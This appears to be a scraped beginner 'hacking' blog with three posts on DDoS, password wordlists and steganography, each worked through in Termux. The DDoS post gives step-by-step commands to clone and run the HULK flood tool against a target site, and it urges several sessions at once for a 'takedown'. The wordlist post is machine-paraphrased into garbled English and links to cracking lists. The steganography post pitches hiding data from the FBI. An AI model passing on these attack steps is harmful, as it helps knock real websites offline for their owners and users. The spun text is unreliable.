Nitros Portal (noob hackers)

Sunday, November 26, 2023

November 26, 2023

req

Social Media Buttons

Today I'm here going to share the step by step tutorial about "what is ddos". By this article, you can get a lot of information about what is ddos, what is dos, how to ddos in termux. And I'm damn sure that you will never get all these unique information like us on the internet anywhere else.

what is ddos

what is ddos

what is ddos


Hey, guys iam back with a new post, so today we are going to know about DDOS & DOS attacks in


this post, so come on lets get started. DDOS is known as (Distributed Denial Of  Service) and DOS


is know as (Denial Of Service) they are the tools or you can say softwares or may be scripts whatever

it may be. the use of these tools is to down or to make unavailable the perticular target server for short

span of time. As you know whenever you visit to some websites like Shopping, Books websites you

may have seen that the web page of that website does'nt load or open for long time so that time you just

exit from that website, so the reason for that slowww motion loading is DDOS or DOS attacks on that

websites yes, you heard right some times hackers perform this DDOS or DOS on target servers this

results as huge loss for website ogranisations and the people who are surfing that website. So like this

the DDOS and DOS attacks work now lets see that how DDOS and DOSattack works in perticular way.



Friday, November 10, 2023

November 10, 2023
Delayed Link Opening with Stylish Popup

Click the link to open it after a 15-second delay:

Open Link

Tuesday, August 01, 2023

Saturday, July 20, 2019

July 20, 2019

what is ddos

what is ddos- Hi guy's if you are searching for what is ddos and searching for the best article to get the best explanation about what is ddos. Then you are at the right place.



Today I'm here going to share the step by step tutorial about "what is ddos". By this article, you can get a lot of information about what is ddos, what is dos, how to ddos in termux. And I'm damn sure that you will never get all these unique information like us on the internet anywhere else.

what is ddos

what is ddos

what is ddos


Hey, guys iam back with a new post, so today we are going to know about DDOS & DOS attacks in


this post, so come on lets get started. DDOS is known as (Distributed Denial Of  Service) and DOS


is know as (Denial Of Service) they are the tools or you can say softwares or may be scripts whatever

it may be. the use of these tools is to down or to make unavailable the perticular target server for short

span of time. As you know whenever you visit to some websites like Shopping, Books websites you

may have seen that the web page of that website does'nt load or open for long time so that time you just

exit from that website, so the reason for that slowww motion loading is DDOS or DOS attacks on that

websites yes, you heard right some times hackers perform this DDOS or DOS on target servers this

results as huge loss for website ogranisations and the people who are surfing that website. So like this

the DDOS and DOS attacks work now lets see that how DDOS and DOSattack works in perticular way.



denial of service (DOS)
In DOS attack the hacker first setup the DOS tools to attack the target server or computer to down it or

to make it unavailabe for some time.The hacker first collects some information of website like Hosting,

Domain, Speed and Security etc... After that he starts attacking the website by sending heavy packets fr

om DOS tools which are more than the capacity of the webserver so, after that the website crashes or b

ecome unavailable untill the attack stops. In DOS attack the hacker uses only one computer to down

the website or server or target computer like this the DOS attack works.



The mostly used software for DOS is LOIC



distributed denial of service (DDOS)
In DDOS attacks the BOTS or ZOMBIES (bots) play main role in this attack the hacker first creates

BOTS and ZOBIES from perticular DDOS tools, after that he sends them to weak secured computers

and infect them with his BOTS ARMY after the computers infected by bots successfully the hacker

first sets the taget website and after that he collects some information of website like Security, Domain,

Hosting, Security etc... After all he starts DDOS attack on target computer by commanding the comput

ers which are infected by his BOTS ARMY the bots start sending the packets to the target website aft

er getting command by hacker to attack. When heavy packets are dropped on the website more than

its capacity the website becomes unavailable and take too long time to open. In DDOS attack the hack

er used more than one computer so that's why the attcak called as Distributed Denial Of Service, so

like this the DDOS is performed on the target website by hackers.



The mostly used software for DDOS in LOIC



ddos attack from termux
#Follow below steps


1. Open termux application and apply these commands.


$ apt-get update



$ apt-get upgrade



$ pkg install python



$ pkg install python2



$ pkg install git



$ git clone https://github.com/grafov/hulk



$ ls



$ cd hulk



$ ls



$ chmod +x hulk.py



$ ls



$ python2 hulk.py (paste target website here)



ex:- python2 hulk.py www.examplesite.com



Now do this same steps in 2 to 6 sessions of termuxto do extere takedown. Now you can check that if the website is not loading or opening from long time. Here you made it buddy now you are attacker...



DDOS in laptop or pc is it possible from windows or kali linux to use it ?
Ans:- yes, you can use ddos tools in windows pc and klai linux pc's if you are using kali linux pc or laptop then you can use same script HULK by git cloning same as Termux and same process as Termux and for windows you have to use LOIC software which is too dangerous for a website ... so before using these kind of tools or softwares please take written permission from website owners... so ihope you guys are learning new things in technology world so that's all for today.



If you are still confused with the theoretical part then you must watch our video tutorial...



click here to watch the video



Final words



So guys thanks for visiting our blog. I hope you find our article "what is ddos" helpful for you please do share and comment your thought about this article and keep visiting to get hacking and gaming and lot more tools and news for free. thank you! 
July 20, 2019

what is wordlist

what is wordlist-Greetings folks on the off chance that you are looking for what is wordlist and scanning for the best article to get the best clarification about what is wordlist. At that point you are the ideal spot.



Today I'm going to share the data about "what is wordlist". By this article, you can get a great deal of data about what is wordlist, savage power rundown, and how to make them. What's more, I'm damn certain that you will never get all these novel data like us on the web anyplace else.

what is wordlist

What is wordlist

what is wordlist?

The wordlist is only a rundown of some client passwords which contains just words. Also, it is utilized by programmers for performing hacking. Here are some model passwords which is known as wordlist passwords. Skateboard, iloveme, iamnoob, jessy, mortalfist, similar to this you can see more than 1 million passwords in a solitary wordlist or not as much as that, with the goal that's about wordlist.

Beast power list

The beast power rundown is likewise equivalent to wordlist. In any case, in savage power list, we can see a rundown of words joined with images and numbers. Here are some model passwords which is known as animal power list passwords. Hunter22$, sam44*, loveus))00, similar to this you can see more than 1 million passwords in a solitary savage power list or not as much as that, with the goal that's about wordlist.

Contrast among wordlist and beast power list

There is no such enormous contrast between them. In wordlist we simply use words and we don't utilize images or numbers. In any case, in beast power list, we use words, numbers, images there's nothing more to it.

Programmer's preferred word and beast power rundown's

The programmer's adoration wordlist and animal power rundown's since they make programmers work simple, quick and furthermore they spare a great deal of time. Programmer's simply make them when they have time and after that when programmers need to play out an assault on a specific thing then they utilize the wordlist or savage power rundown's to spare their time and play out an assault effectively. What's more, in the event that they don't utilize wordlist or savage power rundown's for an animal power assaults then they need heaps of time to play out a fruitful assault. With the goal that's the reason programmer's adoration wordlist and savage power list's.

Step by step instructions to make wordlist or beast power list in termux

To start with, introduce Termux application and open Termux application after that pursue beneath directions.

$ pkg introduce nano - y

$ ls

$ nano

Presently click on enter catch and from that point forward, you can see that there is a dark clear page in Termux that is nano editorial manager now in that simply click on that dark page. Presently begin composing passwords there it might be words, images, numbers anything you can make wordlist or savage power show it's your desire. Presently subsequent to composing all passwords simply hold volume down catch of your gadget and X catch in console after that snap on enter catch now a little spring up will seem like this Spare Changed Support? presently here snap on Y catch in your console after that another spring up will seem like this Document NAME TO Compose :- now here you have to name something to your wordlist like pass.txt after that snap on enter catch to spare it. Also, presently to see made wordlist you simply need to pursue beneath steps.

$ clear

$ ls

$ feline pass.txt

Here you can see your passwords in the wordlist. What's more, presently you can utilize it in any savage power content.

Wordlist txt download

https://github.com/dwyl/english-words

https://github.com/paritytech/wordlist/mass/ace/res/wordlist.txt

https://weakpass.com/wordlist/1239

http://www.mediafire.com/document/q8u95nni5nrxuoc/weakpass_2.7z

In the event that you are as yet mistaken for the hypothetical part, at that point you should watch our video instructional exercise...

click here to watch the video

Last words

So folks a debt of gratitude is in order for visiting our blog. I trust you discover our article "what is wordlist " accommodating for you kindly offer and remark your idea about this article and continue visiting to get hacking and gaming and parcel more apparatuses and news for nothing. much obliged to you!
July 20, 2019

what is Steganography

what is steganography - Hi guys if you are searching for the what is steganography and searching for a best article to get the best explanation about what is steganography. Then you are At Right Place.



Today I'm here going to share full explanation about What is steganography. That by this article "what is steganography" you can understand properly without any confusion. And I'm damn sure that you will never get all these unique information like us on the internet anywhere else.



what is steganography
 what is Steganography
what is Steganography


Hey, guys today we are going to know about Steganography and we are going to try it from our Android device with the help of Termux application so first let me explain.

what is Steganography used for?
Nowadays, hackers are using this method to hide the sensitive data inside image like user passwords and databases info etc...to migrate them from one hacker to another hacker to hide their illegal data from FBI. So it's just simple we can also do it from our Android with the help of Termux app so come on let's do it.



Make sure you installed Termux app from play store


1. Now here first select the files that which you want to hide. You need to take any two categories like image and mp3 or  mp4 or pdf it's your wish.



2. Create a new folder in your internal storage name that folder from any name as you wish after that just cut and paste that 2 files which you just selected to do Steganography.



3. After pasting both files. now compress any one document into zip any one of them.

ex:- jpg and mp4 I'm chosen, nowhere I'm gonna compress mp4 as ZIP



4. After that open Termux and follow below commands



$ pkg install cat



$ ls



$ termux -setup-storage



$ ls



$ cd /sdcard/steganography

( after sdcard select that folder in which you just kept mp4 and jpg documents as i said in the first )



$ ls



$ cat (your image name with formate) (your video name with formate) >simple.jpg

ex :- $ cat hacker.jpg simple.zip >noobs.jpg



$ ls



Now, here you can see the third document has been visible in that particular folder now open RAR application and open that folder where you kept steganography documents now open that folder and now here you can see the new jpg which just steganographed from Termux. Now that image looks really original and normal but there's something inside that image which no one knows else you. now it's time to see that what's inside the image now click on that third image and just select EXTRACT now wait for it to extract after extraction you can see that secret video which you just hided in the image in hackers way...wow now that's all for today.



if you are still confused then i think you need to watch this tutorial video...



click here to watch the video

Final words

So guys thanks for visiting our blog. I hope you find our article "what is steganography " helpful for you please do share and comment your thought about this article and keep visiting to get hacking and gaming and lot more tools and news for free. thank you!